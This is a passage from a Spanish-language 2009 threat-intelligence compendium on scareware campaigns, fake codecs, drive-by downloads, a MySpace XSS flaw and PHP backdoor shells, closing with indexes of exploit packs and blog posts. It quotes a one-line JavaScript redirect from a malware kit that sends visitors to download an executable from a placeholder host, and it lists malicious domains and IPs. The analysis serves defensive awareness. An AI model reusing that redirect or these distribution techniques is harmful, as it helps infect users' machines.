El malware es cada vez más peligroso y sigue creciendo en volumen y evolucionando en su complejidad. Técnicas como estas son las pruebas fieles de ello, dándonos una real idea de sus capacidades y de lo importante que es, para la salud de nuestra seguridad, atender adecuadamente a buenas prácticas que permitan mitigar las acciones dañinas.

MySpace susceptible a amenazas a través de XSS Durante el pasado mes se había reportado una vulnerabilidad en la conocida red social MySpace mediante la cual a través de un ataque del tipo XSS (Cross-Site Scripting) es posible diseminar malware o cometer otros actos maliciosos como el robo de perfiles.

XSS es un ataque del tipo scripting que busca explotar vulnerabilidades en el código de las aplicaciones que interpretan el lenguaje HTML, y si bien MySpace incorpora ciertas capas de protección para evitar este tipo de ataques como el bloque de la etiqueta script, la falla permite bypassear el bloqueo por lo que un atacante podría insertar y ejecutar un script malicioso de la siguiente manera:

A pesar de que a través de esta falla se expone la información, perfiles y seguridad de los usuarios, los responsables de MySpace parecen hacer la vista al costado ya que la vulnerabilidad aún no ha sido solucionada.

El problema fue reportado por su descubridor Daniel Lo Nigro el día 19 de Enero del corriente año, quien dejó un ejemplo del " script insertion " realizado, sin obtener respuesta alguna por parte de MySpace. http://www.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=446695851

No es la primera vez, y seguramente no será la última, que MySpace sufre las consecuencias de la inseguridad a través de ataques de scripting. Lo grave del asunto es que se deja en completa disponibilidad la información, los perfiles y la seguridad de sus usuarios. 236

Nueva estrategia de IS para diseminar scareware IE Defender es uno más de los tantos falsos programas de seguridad (scareware, también llamados rogue) que constantemente bombardean a los usuarios con intenciones de infectar sus equipos a través de sitios web que simulan ser legítimos.

Sin embargo, se están detectando nuevas estrategias de diseminación y engaño que no comparten la misma metodología de descarga desde el mismo sitio web del scareware, pero que buscan engañar a los usuarios para lograr sus objetivos; en este caso, IE Defender se está diseminado a través de sitios web que prometen la descarga de música en formato mp3 y películas.

En ninguno de los casos, se descarga el disco o película prometido sino que se descarga alguna de las variantes que componen la familia de IE Defender.

Todas las páginas utilizadas para propagar la amenaza comparten la misma dirección IP (216.240.151.112 ) de descarga: free-games-rapidshare .com movie-rapidshare .com moviesrapidshare .org music-rapidshare .com musicrapidshare .org warez-catalog .com movie-megaupload .com cpmusicpub .com soft-rapidshare .net softrapidshare .com softrapidshare .org ftp-warez .org extra-turbo .com softupdate09 .com cpmusicpub .com free-full .com free-full-download.com free-full-rapidshare.com

Un detalle no menor que identifica a estos sitios maliciosos, es que casi todos simulan ser páginas alojadas en sitios que permiten almacenar archivos como Megaupload, Rapidshare o, directamente, sitios diseñados para descargar warez.

237

Técnicas de engaño que no pasan de moda ¿Somos hijos del rigor?

Una de las cuestiones que a diario motiva alguna reflexión es por qué los usuarios siguen cayendo en trampas ya por demás conocidas.

Técnicas de Ingeniería Social como la doble extensión en los archivos, espacios entre el nombre del archivo y la extensión y, desde que se comenzó a utilizar Internet como plataforma de ataque, técnicas como los falsos códecs son una pequeña muestra de algunas de ellas.

Los sitios web que alojan material pornográfico suelen ser los más visitados en Internet y, también, los más utilizados por los diseminadores de malware para propagar amenazas. Y por más que nos preguntemos cómo puede ser posible que todavía los usuarios sigan infectando sus equipos a través de estas estrategias de engaño, la respuesta parecería recaer en algo tan simple de justificar como "un alto porcentaje de demanda" por el consumo de dicho material, como uno de los más buscados.

Los creadores de malware saben muy bien que la cosa es así, y que la persona que visita un sitio pornográfico, quiere ver pornografía, sin importar el formato con el cual se presente el recurso (video y/o imagen); en consecuencia, si a ese usuario se le ofrece la descarga de uno, e incluso varios, falsos códecs para poder visualizar el supuesto video, lo más probable es que, en la mayoría de los casos, el usuario los descargue.

Entonces, verán en pantalla algo similar a lo mostrado en la captura, que al pasar unos segundos mostrará una ventana pop-ups parecida a la siguiente:

El usuario, pensando que se trata de un códec necesario para la visualización del video, lo instala. En realidad, lo que instala es un malware, hasta el día de la fecha detectado sólo por algunas compañías antivirus.

Por otro lado, existe un aplicativo contituido tan sólo por un archivo HTML que es utilizado para propagar masivamente y a través de cualquier medio este tipo de acciones.

El aplicativo no permite crear ni modificar códigos maliciosos sino que permite la diseminación de los mismos a través del clásico modo mencionado. 238

El único requerimiento es alojar en un servidor (o en cualquier zombie PC) el archivo HTML y especificar en su código la dirección de descarga del malware en la siguiente porción de código.

window.setTimeout("location.href='http://servidor.com/archivo.exe'", 1000);

Como componentes adicionales, el kit propone redirigir también hacia la visualización de un video real. Esto es parte de la estrategia de Ingeniería Social y busca despejar alguna sospecha por parte del usuario.

Ya no hablamos sólo de técnicas como Drive-by-Download, exploit, scripting. ofuscación de código, entre tantos otros, sino que hablamos de cautela y sentido común.

Es decir, no alcanza con sólo confiar la seguridad ante los peligros que representan los códigos maliciosos a soluciones antivirus ya que, en este caso y según el reporte de VT, actualmente los AV nos ofrecen sólo un 35.09% de protección donde sólo 14 de 39 detectan la amenaza, el otro 64.91% dependerá netamente de nuestra habilidad y sentido común para detectar una potencial actividad maliciosa.

Atacando sistemas Mac a través de falsa herramienta de seguridad ¿Quién dijo que todo era para windows?

Si bien es cierto que la masividad de las diferentes técnicas de engaño e infección son extremadamente más comunes en plataformas Windows, la seguridad es competencia de cualquier sistema, sin importar su infraestructura ni plataforma, por lo que también existen amenazas del tipo rogue (también llamado scareware) para sistemas Mac.

En este caso, la reciente falsa herramienta de seguridad llamada iMunizator (en realidad no es tan reciente ;-P ya que sus primeros pasos los dio durante el año 2007 y principios del 2008, sin embargo volvió a la “carga” nuevamente), puede ser descargada desde diferentes sitios web que responden a una sola dirección IP ( 67.205.75.10 ) alojada en Ucrania, en una empresa de web hosting llamada iWeb Technologies Inc . www. imunizator .com www. imunizator .net imunizator .com imunizator .net mac-imunizator .net

Este programa malicioso comparte "espacio web" con otros rogue mucho más conocidos a través de la IP 70.38.19.203 :

Antispyware Deluxe (antispywaredeluxe .com) Antivirus 2009 (antivirus-2009-pro .net) Antivirus 2010 (av2010 .net) Vista Antivirus 2008 (vav-2008 .net)

239 iMunizator viene desplegando sus estrategias de engaño desde hace un tiempo, cambiando de dominios para reflotar, incluso cambiando su nombre (anteriormente llamado MacSweeper ).

Un dato más que interesante es que las acciones de transferencia de fondos para poder “comprar” la falsa herramienta se realiza a través de una compañía de e-commerce llamada Plimus, completamente legal de origen israelí pero con oficinas centralizadas en EEUU (San Diego y Silicon Valley) y en Ucrania.

Es por ello que los usuarios verán en la barra de dirección el protocolo seguro HTTPS presente en toda recomendación, además de otras pautas que pretenden dar seguridad demostrando que estamos operando desde un sitio confiable.

El malware actual busca constantemente obtener información sensible de los usuarios para cometer fraudes donde un alto porcentaje de propagación lo sufren plataformas windows; sin embargo, esto supone que los creadores de malware están virando la mira hacia nuevos objetivos.

En consecuencia, hay que manejar las mismas buenas prácticas de seguridad sin importar la tecnología a la cual se aplique.

Ataque de malware vía Drive-by-Download Uno de los problemas más comunes que sufren la mayoría de los entornos de información, es la mala gestión de las actualizaciones de seguridad, tanto del sistema operativo como de las aplicaciones instaladas. Y, con el mismo nivel de criticidad, uno de los más efectivos ataques que se producen como consecuencia de la falta de actualización, es aquel que se ejecuta vía web, denominado Drive-by-Download .

Este ataque se basa en explotar vulnerabilidades que permitan ejecutar códigos maliciosos a través de la inyección de etiquetas iframe incrustadas en el cuerpo del código HTML, similar al ejemplo que se muestra en la imagen:

240

La etiqueta iframe se ejecuta en segundo plano y de manera transparente para el usuario abriendo una segunda página que por lo general contiene algún script ofuscado que esconde tras su código uno o varios exploits encargados de buscar en el equipo alguna vulnerabilidad específica. Puede darse el caso que cuando el usuario ingresa a un sitio web malicioso o comprometido con estas amenazas, visualice, por ejemplo, lo que se muestra en la siguiente captura (simplemente una serie de puntos):

Sin embargo, al observar el código fuente de la página, veremos el verdadero código que se esconde de manera maliciosa. Esta técnica de ataque supone un riesgo potencial, ya que si un sistema presenta las características que necesita el ataque, el mismo será exitoso. En consecuencia, la contramedida que mitiga de manera efectiva estas acciones maliciosas, es la implementación de las actualizaciones de seguridad, tanto del sistema operativo como de las aplicaciones

Seguridad "electrónica " y propagación de malware Cada vez son más los casos que se conocen sobre infecciones, o potenciales infecciones, a través de dispositivos electrónicos. El último caso conocido, que he comentado en malware preinstalado, ha desatado un interesante debate que me recuerda a una linda anécdota sobre este tema.

Al finalizar una charla sobre Seguridad Antivirus en la cual expliqué en qué se basa la Ingeniería Social y cómo se propagan los gusanos a través de un archivo de texto plano llamado Autorun.inf (no es un malware, simplemente aprovecha la funcionalidad de ejecución automática de Windows), uno de los asistentes me solicitó uno de los programas que había utilizado durante la charla, con lo cual lo copié en una memoria USB y se la pasé, pero esta persona, atento, me dijo: no, no quiero conectar esa memoria en mi equipo ya que puede estar infectada y mi equipo terminará infectado. Aunque la memoria estaba limpia, eso era correcto.

Bueno, dije entonces, "te lo copio en otro soporte"; y copié el mismo archivo en un iPod. La persona quedó conforme y conectó el iPod en su equipo sin tener en cuenta que no estaba haciendo otra cosa que acceder a un dispositivo de almacenamiento que también es susceptible a alojar código dañino.

Los dispositivos de almacenamiento extraíble que se conectan a través del puerto USB poseen un alto porcentaje de eficacia en la diseminación de códigos maliciosos, es decir, no hablamos sólo de memorias USB, hablamos también de iPod, reproductores mp3, mp4, cámaras fotográficas, filmadoras, teléfonos celulares, marcos fotográficos digitales, y cualquier dispositivo que tenga interacción con la PC.

Desde el punto de vista económico, en muchos países se consigue cualquiera de estos dispositivos a un bajo costo, sin embargo, esto supone un riesgo extra debido al poco control que se deposita en el proceso de fabricación de esos dispositivos, y el control de calidad cuando sale a la venta, pudiendo resultar potenciales canales de infección, incluso, a través del CD que acompaña al dispositivo.

En alguna parte leí la recomendación de comprar productos de empresas reconocidas, sin embargo, tampoco es una garantía y, casos como el de Samsung lo demuestran. Como verán, absolutamente nada es seguro, pero si es seguro implementar mecanismos que nos permitan mitigar este tipo de problemas, p.e. mantener actualizado y activo un programa antivirus.

Algunos antecedentes de infección durante el 2008 a través de diferentes dispositivos que se pueden destacar son: 241

Samsung SPF-85H 8-Inch Digital Photo Frame Mercury 1.5" Digital Photo Frame Hewlett-Packard USB Drives 256K / 1GB Insignia 10.4" NS-DPF10A Digital Photo Frame

No es para alarmarse, pero si para estar atentos :-)

Malware preinstalado Con la leyenda “You've been iframed”, “Usted ha sido iframeado” o algo similar, bajo el título principal, leo una noticia en The Register sobre la aparente diseminación de malware por parte de la empresa Samsung, a través de un CD.

Según la fuente de información mencionada, se trata de un portarretratos digital, exactamente el modelo SPF-85H 8-inch Digital Photo Frame, cuyo programa de manejo fotográfico incluido en el CD que acompaña el dispositivo, se encontraría infectado con un código malicioso.

En este caso, la infección sería provocada por una variante de la familia del virus Sality, un malware muy peligroso que posee capacidades polimórficas, y busca infectar los archivos ejecutables que encuentra en el sistema víctima.

Según la misma empresa Samsung, el problema “sólo” estaría limitado a la infección en sistemas Windows XP y, si bien al infectar “sólo” esta plataforma se mantiene un filtro importante, no es un problema menor ni se debe minimizarlo como se intenta hacer desde el sitio web de Samsung, que de hecho ha publicado una pequeña guía de desinfección.

Muchos dispositivos como reproductores MP3 y GPS ya han tenido problemas de este tipo, incluso algunas PC’s como el caso de la Eee Box mini PC de Asus o el reciente de Lenovo que he leído hace un tiempo en el blog de virusattack.

Si bien este tipo de acontecimientos no son una novedad a esta altura de la era digital, constituye un problema realmente preocupante teniendo en cuenta que cada vez son más los dispositivos comprometidos con algún programa dañino antes de llegar al usuario final, ya que deja en evidencia el pobre control de calidad que realizan algunas compañías, más allá de los servicios tercerizados que esta tenga, la responsabilidad de trasmitir confianza a los usuarios y mantener la “seguridad electrónica” recae netamente en la compañía misma. 242

- Anexos - 243

Anexo I. Otros Exploits Pack que se investigaron Además de todo lo que se publicó en materia de Botnets y Exploits Pack, a lo largo del año se investigaron otros crimeware de este estilo que por razones de tiempo, o porque la línea de investigación demandaba un estudio más profundo antes de su publicación, no se publicaron.

Sin embargo, a continuación se exponen unas capturas de algunos de los Exploits Pack motivo de estudios.

AdPack - Advanced Pack

CRiMEPACK 244

Balck Energy DDoS Bot

BlackSun BOT

CleanPack 245

Desconocido

Power Grabber

Desconocido

246

Dark Dimension Bot (DDBot)

Desconocido

Elite Loador (Chimera) 247

Limbo

Napoleon Sploit (mismo autor de Siberia Exploit Pack)

Nuclear Exploit Pack

248

Neon Exploit Pack

PDF Xploit Pack

Infector 249

Anexo II. PHP Shell Attack

PHP Shell Attack I - SimShell Cuando un atacante logra violar los esquemas de protección implementados en un entorno de información, casi con seguridad, lo primero que intentará hacer es implantar "algo" que le permita acceder de manera remota a ese sistema de información, las veces que quiera y desde donde se encuentre.

Básicamente estamos hablando de un backdoor. Una shell en PHP es una aplicación que implantada en, p.e., un servidor vulnerado, cumple la función de acceso "alternativo" al sistema. Existe una cantidad importante de este tipo de aplicativos (r57shell, c99shell, NShell, s72shell, etc.) que muchas veces son empleados para realizar defacing, como el que sucedió recientemente con Google de Marruecos. Pero también para implantar malware.

Una de las tantas es SimShell desarrollada por el grupo llamado Simorgh Security de origen Iraní.

Autores también de otra aplicación similar llamada SimAttacker .

Si bien a simple vista parece muy sencilla, de hecho lo es, también es muy peligrosa porque supone la posibilidad de que el atacante pueda ejecutar comandos en el equipo comprometido, por lo generar servidores que son atacados, por ejemplo, a través ataques de Inclusión Remota de Archivos (Remote File Inclusion).

250

Actualmente esta aplicación posee un muy bajo índice de detección por parte de las firmas antivirus y, contrariamente, un alto porcentaje de utilización por parte de ciberdelincuentes, sumándose a la lista de crimeware como uno de los hermanos más pequeños de los Kits automatizados de administración vía web.

PHP Shell Attack II - DiveShell Los aplicativos escritos en php que permiten ejecutar comandos en equipos vulnerados a través de una shell remota (backdoor) previamente implantada no es un concepto nuevo. De hecho, los defacer las utilizan para desfigurar sitios web (una filosofía un tanto olvidada limitada tan sólo a algunos "nostálgicos" hacktivistas y a prematuros aspirantes a ciberdelincuentes).

Si bien son conceptos diferentes, quizás se podría decir que estos aplicativos escritos en PHP son el hermano "antiguo" de los paquetes crimeware que conocemos hoy y que permiten, no sólo hacer defacing sino que también ejecutar diferentes amenazas a través de diferentes técnicas de ataque e intrusión con herramientas como ZeuS, YES, Unique, Adrenalin, entre tantas otras.

Los grupos de ciberdelincuentes que se dedican a estas actividades suelen desarrollar sus propias armas: las shell en php. Muchos pensarán que para estos casos, hablar de ciberdelincuentes es un poco extremo, pero si consideramos que un defacing es una intrusión no autorizada y bajo ese concepto, por más que se argumente ser una especie de "auditoria" que intenta descubrir las vulnerabilidades para que el webmaster del sitio (o el administrador del servidor) las solucione o que sólo es una faceta destinada a "observar" los sistemas, la intrusión no deja de ser una acción poco ética e ilegal dependiendo el país donde se realice.

En este caso, la aplicación llamada DiveShell fue creada por un grupo de defacers llamado Emperor Hacking Team que, entre otras cosas, son autores de desfiguraciones como las siguientes:

La aplicación, que trabaja desde el servidor, permite la ejecución de comandos sin importar la plataforma en la que se opere, lo que evidentemente constituye un grave peligro en los servidores débiles.

251

La interfaz del backdoor escrito en php es la siguiente:

Aunque el defacing parezca ser una actividad olvidada, la realidad es que constantemente se realizar desfiguraciones de sitios web y de manera esporádica suelen aparecer algunos; sin embargo, casos recientes como el ejecutado contra el NIC de Ecuador o el de Google Marruecos, pueden despertar de manera potencial una "moda" causando un efecto retro, sobre todo en los medios de información.

252

Anexo III. Compendio mensual de información El compendio mensual de información es un resumen que mes a mes se pone a disposición con el objetivo de agilizar el acceso al contenido presentado a lo largo del tiempo. El objetivo es disponer de una especie de índice mediante el cual poder acceder fácilmente a cada noticia.

Este contenido no solo se canalizó a través de Malware Intelligence Blog sino que también en otros sitios web de reconocidas comunidades como EvilFingers Blog y Offensive Computing. Independientemente del contenido expuesto en el presente, muchas otras noticias (no plasmadas en este documento) se publicaron en el Blog de Laboratorio de ESET Latinoamérica. http://blogs.eset-la.com/laboratorio http://offensivecomputing.net http://evilfingers.blogspot.com

Diciembre http://mipistus.blogspot.com/2009/12/compendio-mensual-de-informacion.html

28.12.09 Exploit Pack y su relación con el rogue 27.12.09 Testimonios sobre scareware y estrategia de credibilidad 25.12.09 Siberia Exploit Pack. Otro paquete de explois In-the-Wild 24.12.09 Anti-Virus Live 2010. Chateando con el enemigo 20.12.09 Una recorrida por los últimos scareware XIX 15.12.09 RussKill. Aplicación para realizar ataques de DoS 09.12.09 Fusión. Un concepto adoptado por el crimeware actual II 05.12.09 Campaña de desinformación para propagar malware 03.12.09 Una breve mirada al interior de Fragus 01.12.09 Campaña de propagación de Koobface a través de Blogspot

Malware Disasters Team - A division of Malware Intelligence 26.12.09 Desktop Hijack by Internet Security 2010. Your System Is Infected! 14.12.09 LockScreen. Your computer is infected by Spyware!!! 13.12.09 Waledac/Storm. Past and present a threat 13.12.09 Symbiosis malware present. Koobface 05.12.09 Swizzor reload. Adware and control of P2P networks

Offensive Computing 27.12.09 Siberia Exploit Pack. Another package of explois In-the-Wild 17.12.09 RussKill. Application to perform denial of service attacks 05.12.09 DDoS Botnet. New crimeware particular purpose

Noviembre http://mipistus.blogspot.com/2009/11/compendio-mensual-de-informacion.html

29.11.09 JustExploit. Nuevo Exploit Kit que explota Java 26.11.09 Servicio ruso en línea para comprobar la detección de malware 24.11.09 Espionaje informático a través de malware 22.11.09 DDoS Botnet. Nuevo crimeware de propósito particular 18.11.09 Una recorrida por los últimos scareware XVIII 15.11.09 T-IFRAMER. Kit para la inyección de malware In-the-Wild 06.11.09 Desarrollo de Botnets Open Source. “My last words”? 04.11.09 QuadNT System. Sistema de administración de zombis I (Windows) 02.11.09 Campaña de phishing orientada a usuarios de MSN 02.11.09 ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

Offensive Computing 15.11.09 T-IFRAMER. Kit for the injection of malware In-the-Wild 05.11.09 ZeuS and power Botnet zombie recruitment

253

Octubre http://mipistus.blogspot.com/2009/10/compendio-mensual-de-informacion.html

27.10.09 Una recorrida por los últimos scareware XVII 24.10.09 ZeuS Botnet y su poder de reclutamiento zombi 19.10.09 Pornografía. Excusa perfecta para la propagación de malware II 19.10.09 Malware Intelligence Linkedin Group 18.10.09 Panorama actual del negocio originado por crimeware 17.10.09 ZeuS, spam y certificados SSL 14.10.09 DDBot. Más gestión de botnets vía web 13.10.09 Una recorrida por los últimos scareware XVI 08.10.09 Nivel de (in)madurez en materia de prevención 04.10.09 Automatización en la creación de exploits 01.10.09 Rompiendo el esquema convencional de infección

Septiembre http://mipistus.blogspot.com/2009/09/compendio-mensual-de-informacion.html

28.09.09 Propagación automática de códigos maliciosos vía http 26.09.09 Una recorrida por los últimos scareware XV 26.09.09 Nueva versión de Eleonore Exploits Pack In-the-Wild 24.09.09 CYBINT en el negocio de los ciber-delincuentes rusos 21.09.09 Eficacia de los antivirus frente a ZeuS 18.09.09 Inteligencia informática, Seguridad de la Información y Ciber-Guerra 17.09.09 Phoenix Exploit’s Kit. Otra alternativa para el control de botnets 17.09.09 Green IT utilizado para la propagación de scareware II 15.09.09 Green IT utilizado para la propagación de scareware 12.09.09 Una recorrida por los últimos scareware XIV 09.09.09 La peligrosidad de una nueva generación de bootkits 07.09.09 iNF`[LOADER]. Control de botnets, marihuana y propagación de malware 04.09.09 Bootkit multiplataforma al ataque. ¿La resurrección de los virus de arranque?

Agosto http://mipistus.blogspot.com/2009/08/compendio-mensual-de-informacion-agosto.html

29.08.09 Hybrid Botnet Control System. Desarrollo de http bot en perl 24.08.09 Una recorrida por los últimos scareware XIII 17.08.09 Desarrollo de crimeware Open Source para controlar y administrar botnets 15.08.09 Fragus. Nueva botnet framework In-the-Wild 14.08.09 Liberty Exploit System. Otra alternativa crimeware para el control de botnets 12.08.09 Los precios del crimeware ruso. Parte 2 08.08.09 TRiAD Botnet III. Administración remota de zombis multiplataforma 07.08.09 Una recorrida por los últimos scareware XII 04.08.09 Eleonore Exploits Pack. Nuevo crimeware In-the-Wild 03.08.09 TRiAD Botnet II. Administración remota de zombis multiplataforma

Julio http://mipistus.blogspot.com/2009/07/compendio-mensual-de-informacion-julio.html

30.07.09 Una recorrida por los últimos scareware XI 25.07.09 TRiAD Botnet. Administración remota de zombis en Linux 15.07.09 Software as a Service en la industria del malware 11.07.09 Especial!! ZeuS Botnet for Dummies 08.07.09 Waledac/Storm. Pasado y presente de una amenaza latente 05.07.09 Automatización de procesos anti-análisis II 04.07.09 Masiva campaña de propagación/infección lanzada por Waledac… 03.07.09 Propagación de Malware a través de sitios con formato de blogging y BlackHat SEO

254

Junio http://mipistus.blogspot.com/2009/06/compendio-mensual-de-informacion-junio.html

29.06.09 ElFiesta. Reclutamiento zombi a través de múltiples amenazas 29.06.09 Una recorrida por los últimos scareware X 21.06.09 Simbiosis del malware actual. Koobface 14.06.09 Mirando de cerca la estructura de Unique Sploits Pack 13.06.09 Supuesto Códec para crear videos HD utilizado como carnada para scam 11.06.09 Una recorrida por los últimos scareware IX 07.06.09 Scareware. Repositorio de malware In-the-Wild 05.06.09 Comercio Ruso de versiones privadas de crimeware ¡Aproveche la oferta! 03.06.09 Pornografía. Excusa perfecta para la propagación de malware 02.06.09 Fusión. Un concepto adoptado por el crimeware actual 01.06.09 Botnet. Securización en la nueva versión de ZeuS

Mayo http://mipistus.blogspot.com/2009/05/compendio-mensual-de-informacion-mayo.html

29.05.09 Una recorrida por los últimos scareware VIII 27.05.09 Unique Sploits Pack. Manipulando la seguridad del atacante II 23.05.09 PHP Shell Attack II - Dive Shell 21.05.09 YES Exploit System. Manipulando la seguridad del atacante 18.05.09 Defacing como noticia 18.05.09 Masiva propagación de malware a través de falsos sitios de entretenimiento 16.05.09 Scareware. Estrategia de engaño propuesta por Personal Antivirus 15.05.09 Una recorrida por los últimos scareware VII 13.05.09 PHP Shell Attack I - SimShell 10.05.09 Campaña de Ingeniería Social visual orientada a plataformas MacOS 09.05.09 Estrategia BlackHat SEO propuesta por Waledac 06.05.09 Ingeniería Social visual y el empleo de pornografía (…) propagación e infección II 04.05.09 ZeuS Carding World Template. Jugando a cambiar la cara de la botnet 03.05.09 Una recorrida por los últimos scareware VI 02.05.09 Ingeniería Social visual y el empleo de pornografía (…) propagación e infección 01.05.09 Campaña de propagación del scareware MalwareRemovalBot

Abril http://mipistus.blogspot.com/2009/04/compendio-mensual-de-informacion-abril.html

22.04.09 Adrenalin botnet: zona de comando. El crimeware ruso marca la tendencia 18.04.09 Scripting attack II. Conjunción de crimeware para obtener (…) mayor… 18.04.09 Chamaleon botnet. Administración y monitoreo de descargas 15.04.09 Scripting attack. Explotación múltiple de vulnerabilidades 13.04.09 Continúa la importante y masiva campaña scareware 12.04.09 YES Exploit System. Otro crimeware made in Rusia 10.04.09 Falsas páginas utilizadas como vector de propagación de malware 09.04.09 Drive-by-Download y Drive-by-Update como parte del proceso de infección 07.04.09 Waledac. Seguimiento detallado de una amenaza latente 04.04.09 Conficker IV. Dominios relacionados... y controversiales 03.04.09 Conficker III. Campaña de propagación de falsas herramientas de limpieza 02.04.09 Conficker II. Infección distribuida del gusano mediático 01.04.09 Conficker. Cuando lo mediático se hace eco de todos...

Marzo http://mipistus.blogspot.com/2009/03/compendio-mensual-de-informacion-marzo.html

30.03.09 Ingeniería Social visual para la propagación de malware 29.03.09 Una recorrida por los últimos scareware V 27.03.09 Entidades financieras en la mira de la botnet Zeus. Segunda parte 26.03.09 Barracuda Bot. Botnet activamente explotada 25.03.09 Entidades financieras en la mira de la botnet Zeus. Primera parte 23.03.09 Automatización de procesos antianálisis a través de crimeware 255

13.03.09 Campaña de infección scareware a través de falso explorador de Windows 11.03.09 Los precios del crimware ruso 09.03.09 Estrategia de infección agresiva de XP Police Antivirus. Segunda parte 07.03.09 Explotación de vulnerabilidades a través de archivos PDF 06.03.09 Unique Sploits Pack. Crimware para automatizar la explotación de vulnerabilidades 05.03.09 Estrategia de infección agresiva de XP Police Antivirus 03.03.09 Phishing Kit. Creador automático de sitios fraudulentos 01.03.09 Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual

Febrero http://mipistus.blogspot.com/2009/02/compendio-mensual-de-informacion.html

27.02.09 LuckySploit, la mano derecha de Zeus 25.02.09 Phishing Kit In-the-Wild para clonación de sitios web, versión 2 24.02.09 Una recorrida por los últimos scareware IV 23.02.09 Entrevista con Kevin, un defacer Argentino. Segunda parte 22.02.09 Zeus Botnet. Masiva propagación de su troyano. Segunda parte 21.02.09 Paper. Análisis de un ataque de malware basado en web 21.02.09 Google Grupos nuevamente utilizado para diseminar porno spam 20.02.09 Entrevista con Kevin, un defacer Argentino. Primera parte 19.02.09 Más Waledac en acción ¿Puedes adivinar cuánto te amo gano? 18.02.09 Zeus Botnet. Masiva propagación de su troyano. Primera parte 17.02.09 AntiSpyware 2009 amplia su oferta maliciosa y utiliza dominios .pro 16.02.09 Phishing Kit In-the-Wild para clonación de sitios web 14.02.09 Waledac más amoroso que nunca 13.02.09 Estrategias de engaño, spam y códigos maliciosos 11.02.09 Waledac e Ingeniería Social en San Valentín 09.02.09 Explotando vulnerabilidades a través de SWF 07.02.09 Creación Online de malware polimórfico basado en PoisonIvy 05.02.09 Explotación de vulnerabilidades a través de JS 04.02.09 Una recorrida por los últimos scareware III 03.02.09 Propagación masiva de malware en falsos códecs 02.02.09 Drive-by Update para propagación de malware 01.02.09 MySpace suceptible a amenazas a través de XSS

Enero http://mipistus.blogspot.com/2009/01/compendio-mensual-de-informacion-enero.html

30.01.09 Entendiendo las redes Fast-Flux 29.01.09 Nueva estrategia de IS para diseminar scareware 28.01.09 Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs 27.01.09 Técnicas de engaño que no pasan de moda 26.01.09 Atacando sistemas Mac a través de falsa herramienta de seguridad 25.01.09 Desfiguración de sitios web III 24.01.09 Explotación masiva de vulnerabilidades a través de servidores fantasmas 22.01.09 Nació otro pequeño gran hombre 21.01.09 Análisis esquemáticos de un ataque de malware basado en web 19.01.09 Vulnerabilidades & PoC 18.01.09 White paper: Ataques informáticos 17.01.09 Una recorrida por los últimos scareware II 15.01.09 Ataque de malware vía Drive-by-Download 14.01.09 Desfiguración de sitios web II 12.01.09 Seguridad "electrónica" y propagación de malware 10.01.09 Manual de seguridad de Google para Navegadores 08.01.09 Anatomía del exploit MS08-078 by FireEye 06.01.09 Una recorrida por los últimos scareware 04.01.09 Estado de la seguridad según Microsoft 02.01.09 Desfiguración de sitios web de fin de semana 01.01.09 Malware Preinstalado 256

Anexo IV. Línea de tiempo Storm/Waledac ’07-‘09

257

Línea de tiempo Storm/Waledac 2007

258

Línea de tiempo Storm/Waledac 2008 259

Línea de tiempo Storm/Waledac 2009 260

Puntos de diseminación de Waledac

261

Diseminación de Waledac desde Argentina

262

Índice de imágenes

AdPack, 242 Adrenaline, 15-69 AntiSpyware 2009, 223-224-225 Antivirus Live 2010, 152-153-154-155 Automatización, 111-112 Balck Energy DDoS Bot, 37-243 Barracuda Bot, 76 BlackHat SEO, 178-189 BlackSun BOT, 243 Chamaleon botnet, 70-71 Chimera, 245 CleanPack, 243 Conficker, 209-210-211-212 CRiMEPACK, 242 Crimeware, 11 CRUM Cryptor Polymorphic, 13-14-115-117 CRUM Joiner Polymorphic, 116-118 Dark Dimension Botnet, 95-96-245 DDoS Botnet, 89 Desktop Hijack, 151 DiveShell, 249-250 Drive-by-Download, 203-238 Drive-by-Update, 203-204-233-234 Eleonore Exploits Pack, 35-46-47 ElFiesta, 24-54-55-59 Elite Loador, 245 Espionaje, 145 Estadística malware, 21-26-40-155-164-165-166-176-205-206 Fast-Flux, 83-134-135-177-231 Fragus, 17-25-26-40-41-94 FriJoiner, 13 FTP, 92 Grafo, 120-135-161-180-205-206-211-260-261 Green IT, 167-168 Hybrid Botnet, 36-38 Iframe, 93 iMunizator, 238 iNF`[LOADER], 99 Infector, 247 Ingeniería Social, 144-159-163-164-175-178-181-182-185-187-188-189-190-191-194-195-196-201-213- 216-217-220-221-228-232-235-236 JustExploit, 87 Koobface, 156-179-180 Liberty Exploit System, 43 Limbo, 246 MaaS, 113-114-132 MacSweeper, 238 Malware Catcher, 144 Malware Intelligence Labs, 9 MalwareRemovalBot, 197 MebRoot, 171 Napoleon Sploit, 246 Neon Exploit Pack, 247 Neon Exploit System, 17-18 Nuclear Exploit Pack, 246 PDF Xploit Pack, 247 Personal Antivirus, 190 Phishing, 107-108-128-129-131-132-157 Phoenix Exploit’s Kit, 97-98 263

PHP Shell, 118-119 Power Grabber, 244 QuadNT System, 27-28 RegistryFix, 155 RussKill, 86-87 Scareware/Rogue, 144-152-153-154-155-167-168-190-197-214-215-216-217-219-237-238 Script, 26-55-73-82-88-100-120-137-140-141 Siberia Exploit Pack, 85 SimShell, 248 Sniffing, 156-160 Spam, 192-227-228 Sploit25, 19 Storm, 173-174-255-256-257 T-IFRAMER, 90-91-92-93-94 Trade exploit pack, 18-19-20-56-78-89-103-133 TRiAD Project, 38-39-44-45-48-49-50-51 Unique Sploits Pack, 19-56-65-66-78-122 VirTest, 103-104-105-106 Vulnerabilidad, 20-123 Waledac, 173-174-175-193-222-223-225-226-230-256-257-258-259 XP Police Antivirus, 217-220 XS[S]hkatulka, 12 YES Exploit System, 63-64-72-73-122 ZeuEsta, 16 ZeuS, 31-32-33-52-53-54-59-60-61-62-67-68-74-75-79-80 ZoPAck, 29-30 264

Licencia Creative Commons Atribución-No Comercial-Compartir Obras Derivadas Igual 2.5 Argentina.

Jorge Mieres | Malware Intelligence Blog | [email protected] http://mipistus.blogspot.com | http://malwareint.blogspot.com | http://malwaredisasters.blogspot.com